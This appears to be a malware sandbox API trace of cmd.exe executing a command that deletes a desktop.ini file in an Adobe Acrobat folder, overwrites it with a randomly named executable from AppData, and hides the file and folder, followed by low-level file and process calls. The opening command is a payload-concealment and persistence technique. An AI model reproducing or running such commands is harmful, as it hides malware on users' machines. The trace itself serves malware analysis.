/C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > 
\"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\"" [0146.160] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0146.160] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x421d30, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0146.160] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0146.160] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0146.161] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0146.161] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0146.161] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0146.161] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0146.161] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0146.161] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0146.161] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0146.161] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0146.161] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0146.161] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0146.161] GetEnvironmentStringsW () returned 0x422720* [0146.161] FreeEnvironmentStringsW (penv=0x422720) returned 1 [0146.161] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 
| out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0146.161] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0146.161] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0146.161] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0146.161] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0146.161] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0146.161] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0146.161] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0146.161] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0146.161] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0146.161] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f578 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0146.162] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26f578, lpFilePart=0x26f574 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f574*="Desktop") returned 0x18 [0146.162] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0146.162] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f2f4 | out: lpFindFileData=0x26f2f4) returned 0x420db0 [0146.162] FindClose (in: hFindFile=0x420db0 | out: hFindFile=0x420db0) returned 1 [0146.162] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f2f4 | out: lpFindFileData=0x26f2f4) returned 0x420db0 [0146.162] FindClose (in: hFindFile=0x420db0 | out: hFindFile=0x420db0) returned 1 [0146.162] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f2f4 | out: lpFindFileData=0x26f2f4) returned 0x420db0 [0146.162] FindClose (in: hFindFile=0x420db0 | out: hFindFile=0x420db0) returned 1 [0146.162] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: 
"c:\\users\\eebsym5\\desktop")) returned 0x11 [0146.163] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0146.163] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0146.163] GetEnvironmentStringsW () returned 0x4205d0* [0146.163] FreeEnvironmentStringsW (penv=0x4205d0) returned 1 [0146.163] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0146.163] GetConsoleOutputCP () returned 0x1b5 [0146.163] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0146.164] GetUserDefaultLCID () returned 0x409 [0146.164] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0146.164] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26f6b8, cchData=128 | out: lpLCData="0") returned 2 [0146.164] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26f6b8, cchData=128 | out: lpLCData="0") returned 2 [0146.164] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26f6b8, cchData=128 | out: lpLCData="1") returned 2 [0146.164] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0146.164] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0146.164] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0146.164] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0146.164] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0146.164] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0146.164] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0146.164] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0146.165] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0146.165] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0146.165] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0146.166] GetConsoleTitleW (in: lpConsoleTitle=0x410b90, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0146.166] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0146.166] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0146.166] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0146.166] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0146.167] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0146.167] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0146.167] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0146.167] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0146.167] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0146.167] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0146.167] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0146.170] _wcsicmp (_String1="del", _String2=")") returned 59 [0146.170] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0146.170] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0146.170] _wcsicmp (_String1="IF", _String2="del") returned 5 [0146.170] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0146.170] _wcsicmp (_String1="REM", _String2="del") returned 14 [0146.170] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0146.173] _wcsicmp 
(_String1="type", _String2=")") returned 75 [0146.173] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0146.173] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0146.173] _wcsicmp (_String1="IF", _String2="type") returned -11 [0146.173] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0146.173] _wcsicmp (_String1="REM", _String2="type") returned -2 [0146.173] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0146.340] SetErrorMode (uMode=0x0) returned 0x0 [0146.340] SetErrorMode (uMode=0x1) returned 0x0 [0146.340] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4207f0, lpFilePart=0x26ee6c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26ee6c*="Desktop") returned 0x18 [0146.340] SetErrorMode (uMode=0x0) returned 0x1 [0146.341] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0146.341] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0146.346] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0146.347] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x26ebe8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ebe8) returned 0xffffffff [0146.347] GetLastError () returned 0x2 [0146.348] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x26ebe8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ebe8) returned 0xffffffff [0146.348] GetLastError () returned 0x2 [0146.348] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x26ebe8, fSearchOp=0x0, lpSearchFilter=0x0, 
dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ebe8) returned 0x4209c8 [0146.348] FindClose (in: hFindFile=0x4209c8 | out: hFindFile=0x4209c8) returned 1 [0146.348] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x26ebe8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ebe8) returned 0xffffffff [0146.348] GetLastError () returned 0x2 [0146.348] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x26ebe8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ebe8) returned 0x4209c8 [0146.349] FindClose (in: hFindFile=0x4209c8 | out: hFindFile=0x4209c8) returned 1 [0146.349] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0146.349] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0146.349] GetConsoleTitleW (in: lpConsoleTitle=0x26f0e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0146.349] InitializeProcThreadAttributeList (in: lpAttributeList=0x26ef68, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26f030 | out: lpAttributeList=0x26ef68, lpSize=0x26f030) returned 1 [0146.349] UpdateProcThreadAttribute (in: lpAttributeList=0x26ef68, dwFlags=0x0, Attribute=0x60001, lpValue=0x26f028, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26ef68, lpPreviousValue=0x0) returned 1 [0146.349] GetStartupInfoW (in: lpStartupInfo=0x26ef24 | out: lpStartupInfo=0x26ef24*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0146.349] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0146.351] CreateProcessW (in: 
lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x26efc4*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26f010 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" ", lpProcessInformation=0x26f010*(hProcess=0x50, hThread=0x4c, dwProcessId=0xa68, dwThreadId=0xa58)) returned 1 [0146.426] CloseHandle (hObject=0x4c) returned 1 [0146.426] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0146.426] GetEnvironmentStringsW () returned 0x420c58* [0146.426] FreeEnvironmentStringsW (penv=0x420c58) returned 1 [0146.426] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0146.583] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x26ef04 | out: lpExitCode=0x26ef04*=0x0) returned 1 [0146.583] CloseHandle (hObject=0x50) returned 1 [0146.583] _vsnwprintf (in: _Buffer=0x26f04c, _BufferCount=0x13, _Format="%08X", _ArgList=0x26ef10 | out: _Buffer="00000000") returned 8 [0146.583] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0146.583] GetEnvironmentStringsW () returned 0x422708* [0146.583] FreeEnvironmentStringsW (penv=0x422708) returned 1 [0146.583] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0146.583] GetEnvironmentStringsW () returned 0x422708* [0146.583] 
FreeEnvironmentStringsW (penv=0x422708) returned 1 [0146.584] DeleteProcThreadAttributeList (in: lpAttributeList=0x26ef68 | out: lpAttributeList=0x26ef68) [0146.584] GetConsoleTitleW (in: lpConsoleTitle=0x26f2e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0146.584] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x26e360, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x26e364, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x26e360*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0146.584] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0146.584] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0146.585] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0146.585] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini" (normalized: "c:\\users\\alluse~1\\adobe\\acrobat\\10.0\\replic~1\\security\\desktop.ini")) returned 0xffffffff [0146.585] GetLastError () returned 0x2 [0146.585] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security" (normalized: "c:\\users\\alluse~1\\adobe\\acrobat\\10.0\\replic~1\\security")) returned 0x2010 [0146.585] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0146.585] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0146.585] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini" (normalized: "c:\\users\\alluse~1\\adobe\\acrobat\\10.0\\replic~1\\security\\desktop.ini")) returned 0xffffffff [0146.585] GetLastError () returned 0x2 [0146.585] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini", fInfoLevelId=0x0, lpFindFileData=0x423894, fSearchOp=0x0, 
lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x423894) returned 0xffffffff [0146.585] GetLastError () returned 0x2 [0146.585] _get_osfhandle (_FileHandle=2) returned 0xb [0146.585] GetFileType (hFile=0xb) returned 0x2 [0146.585] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0146.585] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26ed60 | out: lpMode=0x26ed60) returned 1 [0146.586] _get_osfhandle (_FileHandle=2) returned 0xb [0146.586] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x26ed94 | out: lpConsoleScreenBufferInfo=0x26ed94) returned 1 [0146.586] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0146.586] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.586] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.586] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.586] GetFileType (hFile=0x7) returned 0x2 [0146.587] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0146.587] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26f484 | out: lpMode=0x26f484) returned 1 [0146.587] _dup (_FileHandle=1) returned 3 [0146.587] _close (_FileHandle=1) returned 0 [0146.587] _wcsicmp (_String1="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini", _String2="con") returned -53 [0146.587] CreateFileW (lpFileName="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini" (normalized: "c:\\users\\alluse~1\\adobe\\acrobat\\10.0\\replic~1\\security\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x26f454, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50 [0146.587] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0146.587] GetConsoleTitleW (in: lpConsoleTitle=0x26f284, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b 
[0146.588] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x26ede8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ede8) returned 0x41e798 [0146.588] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0146.588] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0146.588] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0146.588] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x26dcf4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0146.588] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 4 [0146.588] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.588] GetFileType (hFile=0x58) returned 0x1 [0146.588] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.588] GetFileSize (in: hFile=0x58, lpFileSizeHigh=0x26dd4c | out: lpFileSizeHigh=0x26dd4c*=0x0) returned 0x7d600 [0146.588] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.588] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.588] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.588] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.590] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.590] GetFileType (hFile=0x50) returned 0x1 [0146.590] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.590] GetFileType (hFile=0x50) returned 0x1 [0146.590] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0146.590] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.591] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.591] GetFileType (hFile=0x50) returned 0x1 [0146.591] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.591] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.591] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.591] GetFileType (hFile=0x50) returned 0x1 [0146.591] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.591] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.591] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.591] GetFileType (hFile=0x50) returned 0x1 [0146.591] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.591] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.591] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.591] GetFileType (hFile=0x50) returned 0x1 [0146.592] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.592] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.592] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.592] GetFileType (hFile=0x50) returned 0x1 [0146.592] _get_osfhandle (_FileHandle=1) returned 
0x50 [0146.592] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.592] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.592] GetFileType (hFile=0x50) returned 0x1 [0146.592] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.592] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.592] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.592] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.592] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.592] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.592] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.592] GetFileType (hFile=0x50) returned 0x1 [0146.592] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.592] GetFileType (hFile=0x50) returned 0x1 [0146.592] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.592] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.592] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.592] GetFileType (hFile=0x50) returned 0x1 [0146.592] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.592] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) 
returned 1 [0146.593] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.593] GetFileType (hFile=0x50) returned 0x1 [0146.593] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.593] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.593] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.593] GetFileType (hFile=0x50) returned 0x1 [0146.593] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.593] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.593] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.593] GetFileType (hFile=0x50) returned 0x1 [0146.593] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.593] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, 